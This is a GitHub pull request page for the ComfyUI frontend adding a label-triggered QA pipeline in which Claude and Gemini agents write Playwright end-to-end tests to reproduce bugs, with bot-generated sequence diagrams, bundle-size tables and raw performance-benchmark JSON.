feat: add automated QA pipeline with E2E test-driven bug reproduction (#10835)
Conversation
Three-phase pipeline triggered by labels (`qa-changes`, `qa-full`, `qa-issue`):

1. Research: Claude writes Playwright E2E tests to reproduce reported bugs
2. Reproduce: Deterministic replay with video recording
3. Report: Deploy results to Cloudflare Pages with badges

Key design decisions:

- Playwright assertions are the source of truth (not AI vision)
- Agent has readFixture/readTest tools to discover project patterns
- Bug-specific assertions required (trivial assertions banned)
- Main branch dist cached by SHA to speed up before/after comparisons
- QA deps installed inline in CI (no package.json changes needed)

Verified across 48 runs (22 PRs + 26 issues) with 0 false positives.

Amp-Thread-ID: https://ampcode.com/threads/T-019d519b-004f-71ce-b970-96edd971fbe0
Co-authored-by: Amp <amp@ampcode.com>
🎭 Playwright: ✅ 937 passed, 0 failed · 4 flaky · 📊 Browser Reports
📝 Walkthrough

This pull request introduces a complete end-to-end QA pipeline for ComfyUI that automates testing of pull requests and issues. It combines Playwright-based browser automation, AI-powered analysis via Gemini and Claude APIs, video recording and processing, and deployment to Cloudflare Pages. The system orchestrates multi-phase workflows: PR analysis, deterministic video recording (before/after), agent-driven reproduction testing, and structured report generation with artifacts.
Sequence Diagrams

```mermaid
sequenceDiagram
    participant GH as GitHub (PR/Issue)
    participant CI as GitHub Actions
    participant Gemini as Gemini API
    participant Claude as Claude API
    participant PW as Playwright
    participant ComfyUI as ComfyUI Server
    participant Pages as Cloudflare Pages
    GH->>CI: Label trigger (PR QA)
    CI->>Gemini: qa-analyze-pr (fetch PR diff/issue)
    Gemini->>CI: QA guides (before/after)
    par Before Recording
        CI->>PW: Start browser (main branch)
        PW->>ComfyUI: Navigate to UI
        CI->>Gemini: Generate action plan
        Gemini->>CI: Actions JSON
        CI->>PW: Execute actions + record
        PW->>ComfyUI: Interact with UI
        PW->>CI: WebM video + screenshots
    and After Recording
        CI->>PW: Start browser (PR branch)
        PW->>ComfyUI: Navigate to UI
        CI->>Gemini: Generate action plan (with diff)
        Gemini->>CI: Actions JSON
        CI->>PW: Execute actions + record
        PW->>ComfyUI: Interact with UI
        PW->>CI: WebM video + screenshots
    end
    CI->>Gemini: qa-video-review (before/after MP4)
    Gemini->>CI: Platform-specific QA reports (Markdown)
    CI->>Gemini: qa-generate-test (report + diff)
    Gemini->>CI: Regression test spec
    CI->>Pages: Deploy HTML report + badge
    CI->>GH: Post/update unified QA comment
```
```mermaid
sequenceDiagram
    participant Agent as Claude Agent
    participant MCP as MCP Tools
    participant PW as Playwright Page
    participant FS as File System
    participant Test as Playwright Test Runner
    Agent->>MCP: inspect (read aria snapshot)
    MCP->>PW: page.evaluate (getAriaSnapshot)
    PW->>Agent: Accessibility tree
    Agent->>MCP: readFixture / readTest
    MCP->>FS: Load test templates
    FS->>Agent: Template code
    Agent->>MCP: writeTest (reproduce.spec.ts)
    MCP->>FS: Write test file
    Agent->>MCP: runTest
    MCP->>Test: npx playwright test
    Test->>PW: Execute assertions
    PW->>Test: Pass/Fail result
    Test->>MCP: Output + test code
    MCP->>Agent: Test result + code
    alt Test Passed
        Agent->>MCP: done (verdict=REPRODUCED)
        MCP->>FS: Save final test code
    else Test Failed
        Agent->>Agent: Iterate (refine test)
    end
    MCP->>FS: Write research-log.json
```
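The agent's iterate-until-reproduced loop from the diagram above can be sketched as follows. This is a minimal illustration under assumed types, not the actual `qa-agent.ts` implementation; the `TestRunner` callback stands in for the real MCP `runTest` tool, and the iteration cap is an assumption.

```typescript
// Hypothetical sketch of the research-phase loop: the agent keeps refining a
// Playwright spec until its bug-specific assertions pass (bug reproduced) or
// it runs out of attempts. `runTest` stands in for the real MCP runTest tool.
type Verdict = "REPRODUCED" | "NOT_REPRODUCED";
type TestRunner = (specCode: string) => { passed: boolean; output: string };

export function researchLoop(
  initialSpec: string,
  refine: (spec: string, failureOutput: string) => string,
  runTest: TestRunner,
  maxIterations = 5
): { verdict: Verdict; spec: string; iterations: number } {
  let spec = initialSpec;
  for (let i = 1; i <= maxIterations; i++) {
    const result = runTest(spec);
    if (result.passed) {
      // Test passed => the bug-specific assertions held => bug reproduced.
      return { verdict: "REPRODUCED", spec, iterations: i };
    }
    // Test failed => the agent iterates, refining the spec from the output.
    spec = refine(spec, result.output);
  }
  return { verdict: "NOT_REPRODUCED", spec, iterations: maxIterations };
}
```

Note that "passed" here means the reproduction succeeded, which is the inverse of a normal CI test run; that inversion is why the pipeline bans trivial assertions.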
Estimated code review effort: 🎯 4 (Complex) · ⏱️ ~60 minutes
🚥 Pre-merge checks: ✅ 4 passed · ❌ 1 failed (warning)
🎨 Storybook: ✅ Built — View Storybook
Review the following changes in direct dependencies. Learn more about Socket for GitHub.
Warning Review the following alerts detected in dependencies. According to your organization's Security Policy, it is recommended to resolve "Warn" alerts. Learn more about Socket for GitHub.
📦 Bundle: 5.11 MB gzip · 🔴 +14 B

| Category | Size (baseline) | Δ | Chunk status | Description |
|---|---|---|---|---|
| App Entry Points | 22.3 kB (22.3 kB) | ⚪ 0 B | 1 added / 1 removed | Main entry bundles and manifests |
| Graph Workspace | 1.2 MB (1.2 MB) | ⚪ 0 B | 1 added / 1 removed | Graph editor runtime, canvas, workflow orchestration |
| Views & Navigation | 76.6 kB (76.6 kB) | ⚪ 0 B | 9 added / 9 removed / 2 unchanged | Top-level views, pages, and routed surfaces |
| Panels & Settings | 484 kB (484 kB) | ⚪ 0 B | 10 added / 10 removed / 12 unchanged | Configuration panels, inspectors, and settings screens |
| User & Accounts | 17.1 kB (17.1 kB) | ⚪ 0 B | 5 added / 5 removed / 2 unchanged | Authentication, profile, and account management bundles |
| Editors & Dialogs | 109 kB (109 kB) | ⚪ 0 B | 2 added / 2 removed | Modals, dialogs, drawers, and in-app editors |
| UI Components | 60.3 kB (60.3 kB) | ⚪ 0 B | 5 added / 5 removed / 8 unchanged | Reusable component library chunks |
| Data & Services | 2.97 MB (2.97 MB) | ⚪ 0 B | 13 added / 13 removed / 4 unchanged | Stores, services, APIs, and repositories |
| Utilities & Hooks | 338 kB (338 kB) | ⚪ 0 B | 13 added / 13 removed / 13 unchanged | Helpers, composables, and utility bundles |
| Vendor & Third-Party | 9.8 MB (9.8 MB) | ⚪ 0 B | 16 unchanged | External libraries and shared vendor chunks |
| Other | 8.44 MB (8.44 MB) | ⚪ 0 B | 55 added / 55 removed / 79 unchanged | Bundles that do not match a named category |

⚡ Performance Report
No regressions detected across all metrics. Historical variance: last 15 runs. Trend: last 15 commits on main.

Raw data:

{
"timestamp": "2026-04-03T05:08:39.617Z",
"gitSha": "9572c0ed53ce73a7180115c5ef014afdc2021be6",
"branch": "sno-qa-clean",
"measurements": [
{
"name": "canvas-idle",
"durationMs": 1998.2589999999618,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.656,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 337.768,
"heapDeltaBytes": 19934872,
"heapUsedBytes": 63135768,
"domNodes": 19,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 14.658000000000001,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "canvas-idle",
"durationMs": 2036.7129999999634,
"styleRecalcs": 12,
"styleRecalcDurationMs": 10.223,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 346.37,
"heapDeltaBytes": 21125204,
"heapUsedBytes": 64742272,
"domNodes": 23,
"jsHeapTotalBytes": 22806528,
"scriptDurationMs": 22.491,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-idle",
"durationMs": 2020.6009999999424,
"styleRecalcs": 11,
"styleRecalcDurationMs": 8.922,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 343.443,
"heapDeltaBytes": 20328080,
"heapUsedBytes": 63100352,
"domNodes": 22,
"jsHeapTotalBytes": 22806528,
"scriptDurationMs": 21.687000000000005,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-mouse-sweep",
"durationMs": 1770.7439999999792,
"styleRecalcs": 73,
"styleRecalcDurationMs": 35.163,
"layouts": 12,
"layoutDurationMs": 3.312,
"taskDurationMs": 727.598,
"heapDeltaBytes": 15925300,
"heapUsedBytes": 58768264,
"domNodes": 56,
"jsHeapTotalBytes": 23330816,
"scriptDurationMs": 129.001,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.670000000000012,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-mouse-sweep",
"durationMs": 1758.3759999999984,
"styleRecalcs": 73,
"styleRecalcDurationMs": 33.719,
"layouts": 12,
"layoutDurationMs": 3.407,
"taskDurationMs": 722.924,
"heapDeltaBytes": 15985360,
"heapUsedBytes": 58792056,
"domNodes": 56,
"jsHeapTotalBytes": 23592960,
"scriptDurationMs": 131.686,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66999999999998,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-mouse-sweep",
"durationMs": 2010.4619999999613,
"styleRecalcs": 84,
"styleRecalcDurationMs": 40.824,
"layouts": 12,
"layoutDurationMs": 3.172,
"taskDurationMs": 935.859,
"heapDeltaBytes": 16246276,
"heapUsedBytes": 58814876,
"domNodes": 66,
"jsHeapTotalBytes": 22544384,
"scriptDurationMs": 132.798,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "canvas-zoom-sweep",
"durationMs": 1722.0749999999612,
"styleRecalcs": 32,
"styleRecalcDurationMs": 15.168,
"layouts": 6,
"layoutDurationMs": 0.4990000000000001,
"taskDurationMs": 273.01,
"heapDeltaBytes": 24433148,
"heapUsedBytes": 67512736,
"domNodes": 78,
"jsHeapTotalBytes": 20971520,
"scriptDurationMs": 17.031000000000006,
"eventListeners": 19,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "canvas-zoom-sweep",
"durationMs": 1736.4389999999048,
"styleRecalcs": 32,
"styleRecalcDurationMs": 16.105,
"layouts": 6,
"layoutDurationMs": 0.4940000000000001,
"taskDurationMs": 284.696,
"heapDeltaBytes": 24964932,
"heapUsedBytes": 67485976,
"domNodes": 79,
"jsHeapTotalBytes": 20185088,
"scriptDurationMs": 21.826,
"eventListeners": 19,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "canvas-zoom-sweep",
"durationMs": 1754.203000000075,
"styleRecalcs": 33,
"styleRecalcDurationMs": 15.938999999999998,
"layouts": 6,
"layoutDurationMs": 0.5579999999999999,
"taskDurationMs": 290.70300000000003,
"heapDeltaBytes": 24942656,
"heapUsedBytes": 67801192,
"domNodes": 80,
"jsHeapTotalBytes": 20447232,
"scriptDurationMs": 21.585,
"eventListeners": 19,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "dom-widget-clipping",
"durationMs": 642.0259999999871,
"styleRecalcs": 12,
"styleRecalcDurationMs": 9.486999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 390.153,
"heapDeltaBytes": 6805092,
"heapUsedBytes": 49709164,
"domNodes": 20,
"jsHeapTotalBytes": 12845056,
"scriptDurationMs": 70.19200000000001,
"eventListeners": 2,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "dom-widget-clipping",
"durationMs": 547.5030000000061,
"styleRecalcs": 14,
"styleRecalcDurationMs": 9.804,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 345.288,
"heapDeltaBytes": -3390388,
"heapUsedBytes": 47546956,
"domNodes": 23,
"jsHeapTotalBytes": 15728640,
"scriptDurationMs": 66.56300000000002,
"eventListeners": 2,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "dom-widget-clipping",
"durationMs": 559.0859999999793,
"styleRecalcs": 13,
"styleRecalcDurationMs": 9.216000000000001,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 336.03399999999993,
"heapDeltaBytes": 6265300,
"heapUsedBytes": 49038260,
"domNodes": 22,
"jsHeapTotalBytes": 13631488,
"scriptDurationMs": 66.77999999999999,
"eventListeners": 2,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "large-graph-idle",
"durationMs": 2028.2190000000355,
"styleRecalcs": 12,
"styleRecalcDurationMs": 10.593,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 551.837,
"heapDeltaBytes": 5273208,
"heapUsedBytes": 56263192,
"domNodes": -254,
"jsHeapTotalBytes": 16445440,
"scriptDurationMs": 101.51,
"eventListeners": -121,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "large-graph-idle",
"durationMs": 2055.7730000000447,
"styleRecalcs": 11,
"styleRecalcDurationMs": 10.899000000000003,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 538.865,
"heapDeltaBytes": 4673928,
"heapUsedBytes": 55547192,
"domNodes": -256,
"jsHeapTotalBytes": 16707584,
"scriptDurationMs": 96.45,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "large-graph-idle",
"durationMs": 2028.5599999999704,
"styleRecalcs": 11,
"styleRecalcDurationMs": 9.489999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 524.6999999999999,
"heapDeltaBytes": 4602704,
"heapUsedBytes": 55574788,
"domNodes": -254,
"jsHeapTotalBytes": 16445440,
"scriptDurationMs": 95.72900000000001,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "large-graph-pan",
"durationMs": 2134.890999999982,
"styleRecalcs": 69,
"styleRecalcDurationMs": 15.238999999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 1021.2570000000001,
"heapDeltaBytes": 16769236,
"heapUsedBytes": 70311136,
"domNodes": -261,
"jsHeapTotalBytes": 18485248,
"scriptDurationMs": 383.017,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "large-graph-pan",
"durationMs": 2180.7959999999866,
"styleRecalcs": 71,
"styleRecalcDurationMs": 17.068,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 1131.092,
"heapDeltaBytes": 20380828,
"heapUsedBytes": 72108592,
"domNodes": -258,
"jsHeapTotalBytes": 19271680,
"scriptDurationMs": 438.356,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "large-graph-pan",
"durationMs": 2165.986999999973,
"styleRecalcs": 69,
"styleRecalcDurationMs": 16.211,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 1052.0880000000002,
"heapDeltaBytes": 16169676,
"heapUsedBytes": 68386048,
"domNodes": -258,
"jsHeapTotalBytes": 17174528,
"scriptDurationMs": 387.807,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "large-graph-zoom",
"durationMs": 3134.779999999978,
"styleRecalcs": 66,
"styleRecalcDurationMs": 16.475,
"layouts": 60,
"layoutDurationMs": 7.188,
"taskDurationMs": 1259.287,
"heapDeltaBytes": 4724096,
"heapUsedBytes": 60701136,
"domNodes": -264,
"jsHeapTotalBytes": 16502784,
"scriptDurationMs": 462.33000000000004,
"eventListeners": -127,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "large-graph-zoom",
"durationMs": 3134.8410000000513,
"styleRecalcs": 65,
"styleRecalcDurationMs": 14.546000000000003,
"layouts": 60,
"layoutDurationMs": 7.137,
"taskDurationMs": 1278.661,
"heapDeltaBytes": 9120024,
"heapUsedBytes": 64284656,
"domNodes": -265,
"jsHeapTotalBytes": 15921152,
"scriptDurationMs": 470.9070000000001,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "large-graph-zoom",
"durationMs": 3144.549999999981,
"styleRecalcs": 66,
"styleRecalcDurationMs": 16.902,
"layouts": 60,
"layoutDurationMs": 7.0219999999999985,
"taskDurationMs": 1272.7520000000002,
"heapDeltaBytes": 7357748,
"heapUsedBytes": 61914256,
"domNodes": -264,
"jsHeapTotalBytes": 17494016,
"scriptDurationMs": 479.054,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "minimap-idle",
"durationMs": 2022.4600000000237,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.335000000000003,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 504.01300000000003,
"heapDeltaBytes": 4106484,
"heapUsedBytes": 56494652,
"domNodes": -258,
"jsHeapTotalBytes": 16183296,
"scriptDurationMs": 90.14,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "minimap-idle",
"durationMs": 2051.6680000000633,
"styleRecalcs": 11,
"styleRecalcDurationMs": 9.031999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 522.0409999999999,
"heapDeltaBytes": 4539680,
"heapUsedBytes": 57742532,
"domNodes": -258,
"jsHeapTotalBytes": 16814080,
"scriptDurationMs": 90.391,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.699999999999818
},
{
"name": "minimap-idle",
"durationMs": 2022.2219999999425,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.401000000000002,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 561.034,
"heapDeltaBytes": 4217296,
"heapUsedBytes": 56469764,
"domNodes": -259,
"jsHeapTotalBytes": 16183296,
"scriptDurationMs": 106.021,
"eventListeners": -125,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-dom-widget-clipping",
"durationMs": 579.9409999999625,
"styleRecalcs": 49,
"styleRecalcDurationMs": 13.391,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 373.742,
"heapDeltaBytes": 7088236,
"heapUsedBytes": 49747932,
"domNodes": 24,
"jsHeapTotalBytes": 13369344,
"scriptDurationMs": 130.244,
"eventListeners": 8,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-dom-widget-clipping",
"durationMs": 542.4820000000636,
"styleRecalcs": 48,
"styleRecalcDurationMs": 11.611,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 344.442,
"heapDeltaBytes": 6389312,
"heapUsedBytes": 50722384,
"domNodes": 22,
"jsHeapTotalBytes": 14155776,
"scriptDurationMs": 120.56599999999999,
"eventListeners": 8,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.663333333333338,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-dom-widget-clipping",
"durationMs": 538.579000000027,
"styleRecalcs": 49,
"styleRecalcDurationMs": 11.880999999999998,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 346.48,
"heapDeltaBytes": -2033056,
"heapUsedBytes": 49349220,
"domNodes": 23,
"jsHeapTotalBytes": 15728640,
"scriptDurationMs": 121.666,
"eventListeners": 8,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "subgraph-idle",
"durationMs": 1997.000000000014,
"styleRecalcs": 11,
"styleRecalcDurationMs": 9.384,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 335.692,
"heapDeltaBytes": 19988852,
"heapUsedBytes": 63080348,
"domNodes": 21,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 17.924000000000003,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "subgraph-idle",
"durationMs": 1997.2669999999653,
"styleRecalcs": 11,
"styleRecalcDurationMs": 10.145999999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 336.116,
"heapDeltaBytes": 20642744,
"heapUsedBytes": 64880820,
"domNodes": 22,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 16.5,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "subgraph-idle",
"durationMs": 2017.0049999999264,
"styleRecalcs": 10,
"styleRecalcDurationMs": 8.296999999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 318.668,
"heapDeltaBytes": 20216044,
"heapUsedBytes": 63420524,
"domNodes": 20,
"jsHeapTotalBytes": 22544384,
"scriptDurationMs": 16.066,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-mouse-sweep",
"durationMs": 1691.3119999999822,
"styleRecalcs": 77,
"styleRecalcDurationMs": 37.409000000000006,
"layouts": 16,
"layoutDurationMs": 4.475999999999999,
"taskDurationMs": 637.0140000000001,
"heapDeltaBytes": 11584472,
"heapUsedBytes": 54301460,
"domNodes": 64,
"jsHeapTotalBytes": 23592960,
"scriptDurationMs": 94.028,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.800000000000182
},
{
"name": "subgraph-mouse-sweep",
"durationMs": 1988.2539999999835,
"styleRecalcs": 89,
"styleRecalcDurationMs": 45.725,
"layouts": 16,
"layoutDurationMs": 4.601,
"taskDurationMs": 909.1500000000001,
"heapDeltaBytes": 11897152,
"heapUsedBytes": 55095004,
"domNodes": 75,
"jsHeapTotalBytes": 22544384,
"scriptDurationMs": 96.61200000000001,
"eventListeners": 6,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "subgraph-mouse-sweep",
"durationMs": 1688.3649999999761,
"styleRecalcs": 76,
"styleRecalcDurationMs": 38.134,
"layouts": 16,
"layoutDurationMs": 4.841,
"taskDurationMs": 665.9920000000001,
"heapDeltaBytes": 12346640,
"heapUsedBytes": 55328876,
"domNodes": 63,
"jsHeapTotalBytes": 23068672,
"scriptDurationMs": 98.533,
"eventListeners": 4,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333335,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "viewport-pan-sweep",
"durationMs": 8144.541999999945,
"styleRecalcs": 250,
"styleRecalcDurationMs": 42.02,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 3464.192,
"heapDeltaBytes": 24982320,
"heapUsedBytes": 75780152,
"domNodes": -257,
"jsHeapTotalBytes": 19271680,
"scriptDurationMs": 1199.3770000000002,
"eventListeners": -109,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.670000000000012,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "viewport-pan-sweep",
"durationMs": 8181.407000000036,
"styleRecalcs": 252,
"styleRecalcDurationMs": 43.745999999999995,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 3503.9120000000003,
"heapDeltaBytes": 17355696,
"heapUsedBytes": 68290264,
"domNodes": -254,
"jsHeapTotalBytes": 20320256,
"scriptDurationMs": 1209.86,
"eventListeners": -111,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.80000000000109
},
{
"name": "viewport-pan-sweep",
"durationMs": 8145.138999999972,
"styleRecalcs": 252,
"styleRecalcDurationMs": 42.138,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 3534.386,
"heapDeltaBytes": 25530960,
"heapUsedBytes": 75857940,
"domNodes": -254,
"jsHeapTotalBytes": 19009536,
"scriptDurationMs": 1215.641,
"eventListeners": -107,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.80000000000109
},
{
"name": "vue-large-graph-idle",
"durationMs": 11890.125000000011,
"styleRecalcs": 0,
"styleRecalcDurationMs": 0,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 11880.043,
"heapDeltaBytes": -30918872,
"heapUsedBytes": 166843080,
"domNodes": -8331,
"jsHeapTotalBytes": 28139520,
"scriptDurationMs": 567.561,
"eventListeners": -16464,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.220000000000073,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-idle",
"durationMs": 11777.085999999941,
"styleRecalcs": 0,
"styleRecalcDurationMs": 0,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 11762.448,
"heapDeltaBytes": -34360624,
"heapUsedBytes": 159497492,
"domNodes": -8331,
"jsHeapTotalBytes": 19750912,
"scriptDurationMs": 573.4050000000001,
"eventListeners": -16464,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.223333333333358,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-idle",
"durationMs": 11883.965000000102,
"styleRecalcs": 0,
"styleRecalcDurationMs": 0,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 11872.829,
"heapDeltaBytes": -39893352,
"heapUsedBytes": 166265172,
"domNodes": -8331,
"jsHeapTotalBytes": 27090944,
"scriptDurationMs": 574.331,
"eventListeners": -16464,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.223333333333358,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-pan",
"durationMs": 14303.716000000008,
"styleRecalcs": 68,
"styleRecalcDurationMs": 13.810000000000016,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 14282.717,
"heapDeltaBytes": -46113528,
"heapUsedBytes": 148080556,
"domNodes": -8333,
"jsHeapTotalBytes": -2269184,
"scriptDurationMs": 837.723,
"eventListeners": -16488,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.219999999999953,
"p95FrameDurationMs": 16.799999999999272
},
{
"name": "vue-large-graph-pan",
"durationMs": 14238.937000000078,
"styleRecalcs": 64,
"styleRecalcDurationMs": 13.738,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 14220.278,
"heapDeltaBytes": -6789188,
"heapUsedBytes": 187132276,
"domNodes": -8331,
"jsHeapTotalBytes": 26480640,
"scriptDurationMs": 887.7140000000002,
"eventListeners": -16462,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.220000000000073,
"p95FrameDurationMs": 16.700000000000728
},
{
"name": "vue-large-graph-pan",
"durationMs": 13982.488999999987,
"styleRecalcs": 65,
"styleRecalcDurationMs": 13.39399999999999,
"layouts": 0,
"layoutDurationMs": 0,
"taskDurationMs": 13964.07,
"heapDeltaBytes": -15852344,
"heapUsedBytes": 186113008,
"domNodes": -8333,
"jsHeapTotalBytes": 26218496,
"scriptDurationMs": 869.948,
"eventListeners": -16462,
"totalBlockingTimeMs": 0,
"frameDurationMs": 17.776666666666642,
"p95FrameDurationMs": 16.80000000000291
},
{
"name": "workflow-execution",
"durationMs": 438.7659999999869,
"styleRecalcs": 19,
"styleRecalcDurationMs": 24.655,
"layouts": 4,
"layoutDurationMs": 1.138,
"taskDurationMs": 114.069,
"heapDeltaBytes": 4624668,
"heapUsedBytes": 48901388,
"domNodes": 168,
"jsHeapTotalBytes": 0,
"scriptDurationMs": 23.330000000000002,
"eventListeners": 71,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.66333333333332,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "workflow-execution",
"durationMs": 96.63000000000466,
"styleRecalcs": 11,
"styleRecalcDurationMs": 17.773999999999997,
"layouts": 5,
"layoutDurationMs": 1.688,
"taskDurationMs": 82.58799999999998,
"heapDeltaBytes": 2719244,
"heapUsedBytes": 47399020,
"domNodes": 141,
"jsHeapTotalBytes": 524288,
"scriptDurationMs": 20.515999999999995,
"eventListeners": 37,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.663333333333338,
"p95FrameDurationMs": 16.700000000000273
},
{
"name": "workflow-execution",
"durationMs": 456.0999999999922,
"styleRecalcs": 18,
"styleRecalcDurationMs": 24.045000000000005,
"layouts": 5,
"layoutDurationMs": 1.3200000000000003,
"taskDurationMs": 119.387,
"heapDeltaBytes": 4516176,
"heapUsedBytes": 49196084,
"domNodes": 157,
"jsHeapTotalBytes": 262144,
"scriptDurationMs": 29.253,
"eventListeners": 71,
"totalBlockingTimeMs": 0,
"frameDurationMs": 16.666666666666668,
"p95FrameDurationMs": 16.700000000000273
}
]
}
Pull request overview
